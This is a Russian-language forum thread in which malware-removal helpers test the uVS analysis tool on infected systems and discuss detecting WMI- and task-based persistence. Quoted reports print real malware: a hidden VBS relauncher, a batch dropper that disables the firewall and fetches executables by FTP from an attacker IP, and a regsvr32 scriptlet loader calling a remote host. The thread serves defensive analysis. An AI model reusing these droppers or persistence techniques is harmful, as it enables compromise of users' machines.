uVS - Тестирование

[santy 151]

похоже, через задачу все это запускается:

Цитата

 

Полное имя                  C:\PROGRAMDATA\WINDOWS\ONE.VBS
Имя файла                   ONE.VBS
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Размер                      420 байт
Создан                      28.04.2017 в 18:54:06
Изменен                     28.04.2017 в 18:54:06
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                            
Доп. информация             на момент обновления списка
SHA1                        FD70ED4E3DD4A5FF94798DE950B71E5074B4D3FC
MD5                         C4B515202AAF2BD57A472E027F2931EA
                            
#FILE#                      On error resume next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

WScript.Sleep 1000
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "svnhost.exe" Then
Running = True
Exit For
End If
Next
If Not Running Then
WshShell.Run "C:\ProgramData\Windows\onestart.bat", 0
End if

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\RUNTIME

 

http://www.tehnari.ru/f183/t253600/
                            

[santy 151]

а вот эта связка в предыдущей теме:
 

Цитата

 

Полное имя                  C:\PROGRAMDATA\WINDOWS\ONE.VBS
Имя файла                   ONE.VBS
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Размер                      420 байт
Создан                      30.04.2017 в 00:15:46
Изменен                     30.04.2017 в 00:15:46
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                            
Доп. информация             на момент обновления списка
SHA1                        FD70ED4E3DD4A5FF94798DE950B71E5074B4D3FC
MD5                         C4B515202AAF2BD57A472E027F2931EA
                            
#FILE#                      On error resume next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

WScript.Sleep 1000
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "svnhost.exe" Then
Running = True
Exit For
End If
Next
If Not Running Then
WshShell.Run "C:\ProgramData\Windows\onestart.bat", 0
End if

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\RUNTIME
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini
                            

 

и

Цитата

 

Полное имя                  C:\PROGRAMDATA\WINDOWS\ONESTART.BAT
Имя файла                   ONESTART.BAT
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ [Запускался неявно или вручную]
Размер                      478 байт
Создан                      30.04.2017 в 00:15:46
Изменен                     30.04.2017 в 00:15:46
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                            
Доп. информация             на момент обновления списка
SHA1                        033BBE569B7C0685D66B91229C81F9E0C35E3076
MD5                         9DF13837E1E563EEF669325B4EFA1C81
                            
#FILE#                      netsh firewall set opmode DISABLE
cd C:\Windows\Temp\
@echo admin_1111>file.txt
@echo 1111>>file.txt
@echo get servicis.exe>>file.txt
@echo get msvcr120.dll>>file.txt
@echo get svnhost.exe>>file.txt
@echo bye>>file.txt
ftp -s:file.txt -i 193.124.186.130
del file.txt
attrib +h +r +s /S /D C:\Windows\Temp\servicis.exe
attrib +h +r +s /S /D C:\Windows\Temp\msvcr120.dll
attrib +h +r +s /S /D C:\Windows\Temp\svnhost.exe
sc start Release
start C:\Windows\Temp\servicis.exe
exit

                            
Ссылки на объект            
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini

 

http://www.tehnari.ru/f35/t253566/
                            

[demkd 590]

Да, задачи часто используют для перезапуса, а теперь и wmi.
---------------------------------------------------------
 4.00.1
---------------------------------------------------------
 o Добавлена новая категория "WMI: обработчики событий".

 

[PR55.RP55 82]

А 

\TEMPORARY INTERNET FILES\CONTENT.IE5\

uVS когда нибудь будет очищать ?

Я вчера там вирусы видел и сегодня в другой системе вижу.

---------------------------------------------------------
 4.00 RC 1
---------------------------------------------------------

 o Функция удаления временных файлов теперь удаляет все _исполняемые_ файлы из каталога c:\windows\prefetch

----------------------------------------------------------

Образ пример: http://zalil.su/4585859

[demkd 590]

7 минут назад, PR55.RP55 сказал:

\TEMPORARY INTERNET FILES\CONTENT.IE5\

кэш эксплорера чистится всегда, если не чистится то это не кэш эксплорера :D

[PR55.RP55 82]

30 минут назад, demkd сказал:

чистится

Да сейчас проверил - чистится.

Но раньше не чистился. ( 2015)

И в WhatsNew.txt  я соответствующей записи не вижу.

[PR55.RP55 82]

+

Если только это:

 3.77.14
---------------------------------------------------------
 o В функцию удаления временных файлов добавлено 4 каталога.

Так и надо писать в виде списка - какие это каталоги.

[demkd 590]

8 часов назад, PR55.RP55 сказал:

Да сейчас проверил - чистится.

Но раньше не чистился. ( 2015)

И в WhatsNew.txt  я соответствующей записи не вижу.

---------------------------------------------------------
 3.44
---------------------------------------------------------
 o В список очистки временных файлов добавлены:
   o _назначенные_пользователем_ каталоги с кэшем MSIE.
   o каталоги с кэшем Firefox.
   o каталоги с кэшем Opera.
   o каталоги с кэшем Chrome.

Дефолтный кэш чистился до 3.44 с момента появления функции, а с 3.44 чистится и дефолтный и реальный путь.

[santy 151]

15 часов назад, demkd сказал:

Да, задачи часто используют для перезапуса, а теперь и wmi.

здесь похоже это реализовано, но пока что справились только с удалением задач.

Цитата

p.s. вирус снова себя проявил, в папке windows\debug появляются файлы item.dat и PASSWD.LOG, в процессах появляется Rundll.exe cо строкой ServiceMain aaaa

https://forum.kasperskyclub.ru/index.php?showtopic=55429

 

эта функция ServiceMain как раз экспортируется из test.dat (dll) при скачивании файлика через SCRCONS.EXE

[demkd 590]

2 часа назад, santy сказал:

https://forum.kasperskyclub.ru/index.php?showtopic=55429

так тут использовали FRST он wmi фильтров и привязанных скриптов/программ не видит, во всяком случае в текущей версии за 6-е мая, как минимум не увидел моего тестового скрипта, так можно бесконечно бороться если скрипт онлайновый и в виде файла его нет на диске.

[PR55.RP55 82]

1) Программа: WMI Explorer

https://wmie.codeplex.com/

Вместе с программным кодом:  https://wmie.codeplex.com/SourceControl/latest#WmiExplorer/WmiExplorer/WmiExplorer.Designer.cs

2) По SCRCONS.EXE

Проблема известна с апреля 2016.

" Всякий раз когда пользователь запускает браузер снова и снова  открывается страница с подозрительным содержимым.

Проблема связана с без файловым заражением ( ярлыков браузера. )

Аналитик: Джордже Лукич, ( Djordje Lukic ) аналитик Zemana

Самое интересное, что это реализуется с помощью WMI.

Вредоносная программа работает через регистрацию себя в качестве экземпляра класса ActiveScriptEventConsumer в пространстве имен ROOT\subscription.  Этот экземпляр будет называться ASEC и содержать сценарий VBScript, сценарий будет выполняться каждые 10 секунд. При выполнении, будут модифицированы  ярлыки вашего браузера так, что он откроет Yeabests.cc при запуске.

Записи можно увидев при помощи программ: wbemtest.exe или WMI Explorer

Инфекция поражает более 14 разных браузеров.

Инсталлятор этой инфекции удаляет себя при\после выполнения и не создаёт файлов на жёстком диске.

Находиться только в WMI

-----------

WMI также может использоваться для запуска сценариев VBScript или PowerShell при возникновении определенного события, например, при создании файла или при возникновении какого-либо другого системного события, эта последняя функция  может быть использована разработчиками вредоносных программ при реализации своих целей, таких как создание безконтактных инфекторов.

Так например ярлык: Internet Explorer выполняется с аргументом: " htt*:// yeabests.cc

 

[PR55.RP55 82]

+

Фотка 

[santy 151]

RP55,

ты хотя бы через цитату добавляй вредоносный код, а то антивирус уже блокирует доступ к этой странице.

[PR55.RP55 82]

+

Анализ файла

Полная версия кода:

https://www.hybrid-analysis.com/sample/234c0cced57c6cfca80b62e9618c01eacc716bf46b1d95d56e1b6a610d438c1b?environmentId=100

[PR55.RP55 82]

21 минут назад, santy сказал:

ты хотя бы через цитату добавляй вредоносный код, а то антивирус уже блокирует доступ к этой странице.

Не думал, что у антивируса будет такая реакция.

Изменить сообщение не могу - теперь только Demkd может.

[PR55.RP55 82]

+

Demkd

по поводу WMI в uVS

1) записи отображаются и в категории: Скрипты и собственно в категории: WMI

2) Команда: Добавить хэш файла в базу проверенных...

И что в данном случае будет добавлено в базу и как это повлияет на ситуацию ?

т.е. если хэш будет сформирован\рассчитан  на базе имени...

Насколько это рационально ?

Название то может быть одно и тоже, а вот содержание ?

 

[demkd 590]

12 часов назад, PR55.RP55 сказал:

Проблема известна с апреля 2016.

C 13-го года, во всяком случае уже тогда точно это эксплуатировали во всю.

12 часов назад, PR55.RP55 сказал:

1) Программа: WMI Explorer

И зачем оно мне?

10 часов назад, PR55.RP55 сказал:

И что в данном случае будет добавлено в базу и как это повлияет на ситуацию ?

Для этих объектов я это отключу, теперь уже в след версии которая будет когда-нибудь.

[santy 151]

1 час назад, demkd сказал:

C 13-го года, во всяком случае уже тогда точно это эксплуатировали во всю.

demkd,

а не может быть эта активность связана с недавней утечкой через Shadow Brokers эксплойтов АНБ? аккурат через 1-2 недели после того как были выложены в доступ эксплойты.

https://threatpost.ru/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/21627/

[demkd 590]

7 минут назад, santy сказал:

а не может быть эта активность связана с недавней утечкой через Shadow Brokers эксплойтов АНБ? аккурат через 1-2 недели после того как были выложены в доступ эксплойты.

Готовые mof для эксплуатации данного механизма доступны давно, механизм подробно описан в msdn с рабочими примерами:
https://msdn.microsoft.com/en-us/library/aa393250(v=vs.85).aspx
статьи на эту тему были и в технете в 12-м году
https://gallery.technet.microsoft.com/Create-Permenant-WMI-Event-f67ce5c2
Этот механизм работает даже на Windows 2000, разве что нужны некоторые подготовительные действия, а с XP и старше работает сразу.
Просто мало кто обратил на это внимание, а сейчас загорелось.

[PR55.RP55 82]

12 часов назад, demkd сказал:

В 06.05.2017 at 5:29 PM, PR55.RP55 сказал:

 Программа: WMI Explorer

И зачем оно мне?

Для сравнения результатов, для чего же ещё.

Разработчик потратил _годы на совершенствование своей программы.

Невозможно, вот так сразу взять и сделать идеальный вариант для uVS.

По поводу очистки WMI посмотрим на практике.

А вот по ярлыкам, что ?

Не потребуется доработать механизм очистки и твики ?

[PR55.RP55 82]

+

Коды: http://vinc.top/2017/05/03/windows应急响应（20170503）/

Здесь всё тот-же: //47.88.216.68:8888/test.dat

Но уже работает с другой логикой и задачами.

[demkd 590]

2 часа назад, PR55.RP55 сказал:

Разработчик потратил _годы на совершенствование своей программы.

это его проблемы там писанины на час вместе с реализацией удаления, потому что все просто как мычание.

2 часа назад, PR55.RP55 сказал:

А вот по ярлыкам, что ?

Конкертный текст скрипта никак не влияет на его обнаружение и удаление.

[santy 151]

demkd,

здесь, имхо, подозрительный объект выпадает из поля зрения.

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\REGSVR32.EXE
Имя файла                   REGSVR32.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     4A5BCDD68000
Linker                      9.0
Размер                      19456 байт
Создан                      14.07.2009 в 04:14:15
Изменен                     14.07.2009 в 05:39:29
                            
TimeStamp                   14.07.2009 в 00:14:14
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            REGSVR32.EXE.MUI
Версия файла                6.1.7600.16385 (win7_rtm.090713-1255)
Описание                    Сервер регистрации, (C) Microsoft
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
SHA1                        645C424974FBE5FE7A04CAC73F1C23C96E1570B8
MD5                         59BCE9F07985F8A4204F4D6554CFF708
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows\CurrentVersion\Run\start
start                       regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
                            
Ссылка                      HKLM\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}\StubPath
StubPath                    %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
                            
Ссылка                      HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}\StubPath
StubPath                    regsvr32.exe /s /n /i:U shell32.dll
                            

SRV1C_2017-05-07_19-09-37.7z

 

[demkd 590]

50 минут назад, santy сказал:

здесь, имхо, подозрительный объект выпадает из поля зрения.

да, ключ "i" надо обработать, такое пока только критерием ловить

[demkd 590]

Теперь с этим regsvr32 /u /s /i:http://*  проблем не будет, http://* будет в списке.
---------------------------------------------------------
 4.0.2
---------------------------------------------------------
 o Улучшена функция разбора параметров командной строки.

 o Для обработчиков событий WMI отключена работа с хэшам за бесполезностью.

 o Для удобства анализа в окно ифнормации WMI обработчика добавлены значения описывающие объекты в MOF формате.